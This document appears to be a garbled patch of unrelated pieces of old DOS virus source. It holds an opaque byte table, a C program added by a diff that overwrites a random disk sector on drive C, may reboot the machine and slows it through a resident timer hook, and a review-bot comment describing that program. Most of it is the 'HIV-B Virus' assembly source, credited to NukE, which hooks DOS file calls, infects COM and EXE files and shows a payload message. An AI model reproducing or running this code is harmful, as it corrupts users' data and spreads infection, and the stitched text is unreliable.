db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,
slutt:
size equ $-100h
pgf equ ($+16)/16

@@ -0,0 +1,42 @@
#include <process.h>
#include <stdlib.h>
#include <stdio.h>
#include <conio.h>
#include <dir.h>
#include <dos.h>
#define INTR 0X1C
#ifdef __cplusplus
#define __CPPARGS ...
#else
#define __CPPARGS
#endif
void interrupt ( *oldhandler)(__CPPARGS);
void interrupt handler(__CPPARGS)
{
delay(135);
oldhandler();
}
void main(void)
{
randomize();
char buf[512];
abswrite(2, 1, random(50000)+2000, buf);
if(random(20) == 10) asm INT 19h
oldhandler = getvect(INTR);
setvect(INTR, handler);
_ES = _psp; //PSP address
asm MOV es,es:[2ch]
_AH = 0x49; //Function 49 (remove memory block)
asm INT 21h //Call DOS to execute instruction
_AH = 0x31; //Function 31 (tsr)
_AL = 0x00; //Exit code
_DX = _psp; //PSP address
asm INT 21h //Call DOS to execute instruction
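Review bot: The file is added with no header comment describing its behaviour, and the first statements of `main` are the ones an analyst most needs to know about: `abswrite(2, 1, random(50000)+2000, buf);` writes one sector from the uninitialised `buf` to a random absolute sector of drive 2 (C: in Borland's drive numbering), and `if(random(20) == 10) asm INT 19h` reboots on roughly one run in twenty. I would add a behaviour summary at the top, `/* Behaviour: overwrites one random sector on drive 2 with uninitialised data, may reboot via INT 19h, then stays resident on INT 1Ch adding delay(135) per timer tick */`, so triage does not depend on reading the inline asm. The existing `//PSP address` and `//Function 31 (tsr)` comments describe the DOS calls but not this effect. The hunk header announces 42 lines and the visible listing stops at the last `asm INT 21h` without the closing brace of `main`, so the tail may be missing from this render.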
+745
@@ -0,0 +1,745 @@
DATA_1E EQU 4CH ; Just a Few Data Segments that are
DATA_3E EQU 84H ; Needed for the virus to find some
DATA_5E EQU 90H ; hard core info...
DATA_7E EQU 102H
DATA_8E EQU 106H
DATA_9E EQU 122H
DATA_10E EQU 124H
DATA_11E EQU 15AH
DATA_12E EQU 450H
DATA_13E EQU 462H
DATA_14E EQU 47BH
DATA_15E EQU 0
DATA_16E EQU 1
DATA_17E EQU 2
DATA_18E EQU 6
DATA_42E EQU 0FB2CH
DATA_43E EQU 0FB2EH
DATA_44E EQU 0FB4BH
DATA_45E EQU 0FB4DH
DATA_46E EQU 0FB83H
DATA_47E EQU 0FB8DH
DATA_48E EQU 0FB8FH
DATA_49E EQU 0FB95H
DATA_50E EQU 0FB97H
DATA_51E EQU 0
DATA_52E EQU 2
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h ; Compile this to a .COM file!
; So the Virus starts at 0100h
HIV PROC FAR
START:
JMP LOC_35
DB 0C3H
DB 23 DUP (0C3H)
DB 61H, 6EH, 74H, 69H, 64H, 65H
DB 62H, 0C3H, 0C3H, 0C3H, 0C3H
DB 'HIV-B Virus - Release 1.1 [NukE]'
DB ' '
copyright DB '(C) Edited by Rock Steady [NukE]'
DB 0, 0
DATA_24 DW 0
DATA_25 DW 0
DATA_26 DW 0
DATA_27 DW 706AH
DATA_28 DD 00000H
DATA_29 DW 0
DATA_30 DW 706AH
DATA_31 DD 00000H
DATA_32 DW 0
DATA_33 DW 706AH
DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH
DB 'Edited by Rock Steady [NukE]', 0AH, 0DH
DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH
DB '$'
DB 0E8H, 83H, 3, 3DH, 4DH, 4BH
DB 75H, 9, 55H, 8BH, 0ECH, 83H
DB 66H, 6, 0FEH, 5DH, 0CFH, 80H
DB 0FCH, 4BH, 74H, 12H, 3DH, 0
DB 3DH, 74H, 0DH, 3DH, 0, 6CH
DB 75H, 5, 80H, 0FBH, 0, 74H
DB 3
LOC_1:
JMP LOC_13
LOC_2:
PUSH ES ; Save All Regesters so that when
PUSH DS ; we restore the program it will
PUSH DI ; RUN correctly and hide the fact
PUSH SI ; that any Virii is tampering with
PUSH BP ; the System....
PUSH DX
PUSH CX
PUSH BX
PUSH AX
CALL SUB_6
CALL SUB_7
CMP AX,6C00H
JNE LOC_3 ; Jump if not equal
MOV DX,SI
LOC_3:
MOV CX,80H
MOV SI,DX
LOCLOOP_4:
INC SI ; Slowly down the System a
MOV AL,[SI] ; little.
OR AL,AL ; Zero ?
LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0
SUB SI,2
CMP WORD PTR [SI],4D4FH
JE LOC_7 ; Jump if equal
CMP WORD PTR [SI],4558H
JE LOC_6 ; Jump if equal
LOC_5:
JMP SHORT LOC_12 ;
DB 90H
LOC_6:
CMP WORD PTR [SI-2],452EH
JE LOC_8 ; Jump if equal
JMP SHORT LOC_5 ;
LOC_7:
NOP
CMP WORD PTR [SI-2],432EH
JNE LOC_5 ; Jump if not equal
LOC_8:
MOV AX,3D02H
CALL SUB_5
JC LOC_12 ; Jump if carry Set
MOV BX,AX
MOV AX,5700H
CALL SUB_5 ; Initsilize the virus...
MOV CS:DATA_24,CX ; A Basic Start up to check
MOV CS:DATA_25,DX ; The Interrup 21h
MOV AX,4200H
XOR CX,CX
XOR DX,DX
CALL SUB_5
PUSH CS
POP DS
MOV DX,103H
MOV SI,DX
MOV CX,18H
MOV AH,3FH
CALL SUB_5
JC LOC_10 ; Jump if carry Set
CMP WORD PTR [SI],5A4DH
JNE LOC_9 ; Jump if not equal
CALL SUB_1
JMP SHORT LOC_10
LOC_9:
CALL SUB_4
LOC_10:
JC LOC_11 ; Jump if carry Set
MOV AX,5701H
MOV CX,CS:DATA_24
MOV DX,CS:DATA_25
CALL SUB_5
LOC_11:
MOV AH,3EH ; '>'
CALL SUB_5
LOC_12:
CALL SUB_7
POP AX ; A Stealth Procedure to
POP BX ; end the virus and restore
POP CX ; the program! Pup back all
POP DX ; regesters as we found them!
POP BP ; so nothings changed...
POP SI
POP DI
POP DS
POP ES
LOC_13:
JMP CS:DATA_28
DB 0B4H, 2AH, 0CDH, 21H, 0C3H
HIV ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_1 PROC NEAR ; Start of the Virus!
MOV AH,2AH ; Get the Date system Date!
INT 21H ; If its Friday Display the
; message at Data34 and End!
CMP AL,6
JE LOC_15 ; If Friday display message
JNZ LOC_14 ; If not continue infecting
LOC_14: ; and screwing the system!
MOV CX,[SI+16H]
ADD CX,[SI+8]
MOV AX,10H
MUL CX ; dx:ax = reg * ax
ADD AX,[SI+14H]
ADC DX,0
PUSH DX
PUSH AX
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP DX,0
JNE LOC_16 ; Jump if not equal
CMP AX,64EH
JAE LOC_16 ; Jump if above or =
POP AX
POP DX
STC ; Set carry flag
RETN
LOC_15:
MOV DX,OFFSET DATA_34+18H ; Display Message at Data34!
MOV AH,9 ; With New Offset Address in
INT 21H ; memory!
;
POP AX ; Restore all Regesters as if
POP BX ; nothing was changed and exit
POP CX ; virus and run File...
POP DX
POP SI
POP DI
POP BP
POP DS
POP ES
MOV AH,0 ; Exit Virus if your in a .EXE
INT 21H ; File!!!
; Exit virus if your in a .COM
INT 20H ; File!!!
LOC_16:
MOV DI,AX
MOV BP,DX
POP CX
SUB AX,CX
POP CX
SBB DX,CX
CMP WORD PTR [SI+0CH],0
JE LOC_RET_19 ; Jump if equal
CMP DX,0
JNE LOC_17 ; Jump if not equal
CMP AX,64EH
JNE LOC_17 ; Jump if not equal
STC ; Set carry flag
RETN
LOC_17:
MOV DX,BP
MOV AX,DI
PUSH DX
PUSH AX
ADD AX,64EH
ADC DX,0
MOV CX,200H
DIV CX ; Find out How much System
LES DI,DWORD PTR [SI+2] ; memory is available...
MOV CS:DATA_26,DI ;
MOV CS:DATA_27,ES ; Every so often make the
MOV [SI+2],DX ; system memory small than
CMP DX,0 ; what it already is...
JE LOC_18 ; Screws up the users hehe
INC AX
LOC_18:
MOV [SI+4],AX
POP AX
POP DX
CALL SUB_2
SUB AX,[SI+8]
LES DI,DWORD PTR [SI+14H]
MOV DS:DATA_9E,DI
MOV DS:DATA_10E,ES
MOV [SI+14H],DX ; Tie up some memory!
MOV [SI+16H],AX ; release it on next execution
MOV DS:DATA_11E,AX ; Jump to su routine to do
MOV AX,4202H ; this and disable interrups
XOR CX,CX
XOR DX,DX
CALL SUB_5
CALL SUB_3
JC LOC_RET_19
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
MOV AH,40H
MOV DX,SI
MOV CX,18H
CALL SUB_5
LOC_RET_19:
RETN
SUB_1 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_2 PROC NEAR
MOV CX,4
MOV DI,AX
AND DI,0FH
LOCLOOP_20:
SHR DX,1 ; Shift w/zeros fill
RCR AX,1 ; Rotate thru carry
LOOP LOCLOOP_20 ; Loop if cx > 0
MOV DX,DI
RETN
SUB_2 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_3 PROC NEAR
MOV AH,40H
MOV CX,64EH
MOV DX,100H
CALL SUB_6
JMP SHORT LOC_24
DB 90H
;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_4:
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP AX,64EH
JB LOC_RET_23 ; Jump if below
CMP AX,0FA00H
JAE LOC_RET_23 ; Jump if above or =
PUSH AX
CMP BYTE PTR [SI],0E9H
JNE LOC_21 ; Jump if not equal
SUB AX,651H
CMP AX,[SI+1]
JNE LOC_21 ; Jump if not equal
POP AX
STC ; Set carry flag
RETN
LOC_21:
CALL SUB_3
JNC LOC_22 ; Jump if carry=0
POP AX
RETN
LOC_22:
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
POP AX
SUB AX,3
MOV DX,122H
MOV SI,DX
MOV BYTE PTR CS:[SI],0E9H
MOV CS:[SI+1],AX
MOV AH,40H
MOV CX,3
CALL SUB_5
LOC_RET_23:
RETN
SUB_3 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_5 PROC NEAR
LOC_24:
PUSHF ; Push flags
CALL CS:DATA_28
RETN
SUB_5 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_6 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable the interrupts
LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus
MOV CS:DATA_29,AX ; to the COM File...
MOV CS:DATA_30,ES
MOV AX,46AH
MOV DS:DATA_5E,AX
MOV WORD PTR DS:DATA_5E+2,CS
LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word..
MOV CS:DATA_32,AX ; get your info needed on
MOV CS:DATA_33,ES ; System...
LES AX,CS:DATA_31
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable the interrupts
POP ES ; and restore regesters!
POP DS ; go back to the file
POP AX ; being executed...
RETN
SUB_6 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_7 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable interrupts
LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy
MOV DS:DATA_5E,AX ; yourself to the EXE
MOV WORD PTR DS:DATA_5E+2,ES
LES AX,DWORD PTR CS:DATA_32
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable interrupts
POP ES
POP DS
POP AX
RETN
SUB_7 ENDP
DB 0B0H, 3, 0CFH, 50H, 53H, 51H
DB 52H, 56H, 57H, 55H, 1EH, 6
DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH
DB 62H, 4, 0A1H, 50H, 4, 2EH
DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H
DB 4, 0A3H, 50H, 4, 2EH, 0A1H
DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9
DB 0B9H, 1, 0, 0CDH, 10H, 0E8H
DB 34H, 0, 0E8H, 0B7H, 0, 2EH
DB 0A1H, 0C7H, 4, 0A3H, 50H, 4
DB 0B3H, 2, 0B8H, 2, 9, 0B9H
DB 1, 0, 0CDH, 10H, 2EH, 0A1H
DB 0CEH, 4, 0A3H, 50H, 4, 7
DB 1FH
DB ']_^ZY[X.'
DB 0FFH, 2EH, 0CAH, 4
DATA_36 DW 0
DATA_37 DW 1010H
DATA_39 DB 0
DATA_40 DD 706A0000H
DB 0, 0, 2EH, 0A1H, 0C7H, 4
DB 8BH, 1EH, 4AH, 4, 4BH, 2EH
DB 0F6H, 6, 0C9H, 4, 1, 74H
DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH
DB 80H, 36H, 0C9H, 4, 1, 0EBH
DB 0AH
LOC_25:
CMP AL,0
JG LOC_26 ; Jump if >
XOR CS:DATA_39,1
LOC_26:
TEST CS:DATA_39,2
JZ LOC_27 ; Jump if zero
CMP AH,18H
JB LOC_28 ; Jump if below
XOR CS:DATA_39,2
JMP SHORT LOC_28
LOC_27:
CMP AH,0
JG LOC_28 ; Jump if >
XOR CS:DATA_39,2
LOC_28:
CMP BYTE PTR CS:DATA_36,20H
JE LOC_29 ; Jump if equal
CMP BYTE PTR CS:DATA_37+1,0
JE LOC_29 ; Jump if equal
XOR CS:DATA_39,2
LOC_29:
TEST CS:DATA_39,1
JZ LOC_30 ; Jump if zero
INC BYTE PTR CS:DATA_37
JMP SHORT LOC_31
LOC_30:
DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H)
LOC_31:
TEST CS:DATA_39,2 ; (706A:04C9=0)
JZ LOC_32 ; Jump if zero
INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
JMP SHORT LOC_RET_33 ; (0555)
LOC_32:
DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
LOC_RET_33:
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_8 PROC NEAR
MOV AX,CS:DATA_37
MOV DS:DATA_12E,AX ; Get info on type of Video
MOV BH,DS:DATA_13E ; Display the system has...
MOV AH,8
INT 10H ; with ah=functn 08h
; basically fuck the cursur..
MOV CS:DATA_36,AX
RETN
SUB_8 ENDP
DB 50H, 53H, 51H, 52H, 56H, 57H
DB 55H, 1EH, 6, 33H, 0C0H, 50H
DB 1FH, 81H, 3EH, 70H, 0, 6DH
DB 4, 74H, 35H, 0A1H, 6CH, 4
DB 8BH, 16H, 6EH, 4, 0B9H, 0FFH
DB 0FFH, 0F7H, 0F1H, 3DH, 10H, 0
DB 75H, 24H, 0FAH, 8BH, 2EH, 50H
DB 4, 0E8H, 0BEH, 0FFH, 89H, 2EH
DB 50H, 4, 0C4H, 6, 70H, 0
DB 2EH, 0A3H, 0CAH, 4, 2EH, 8CH
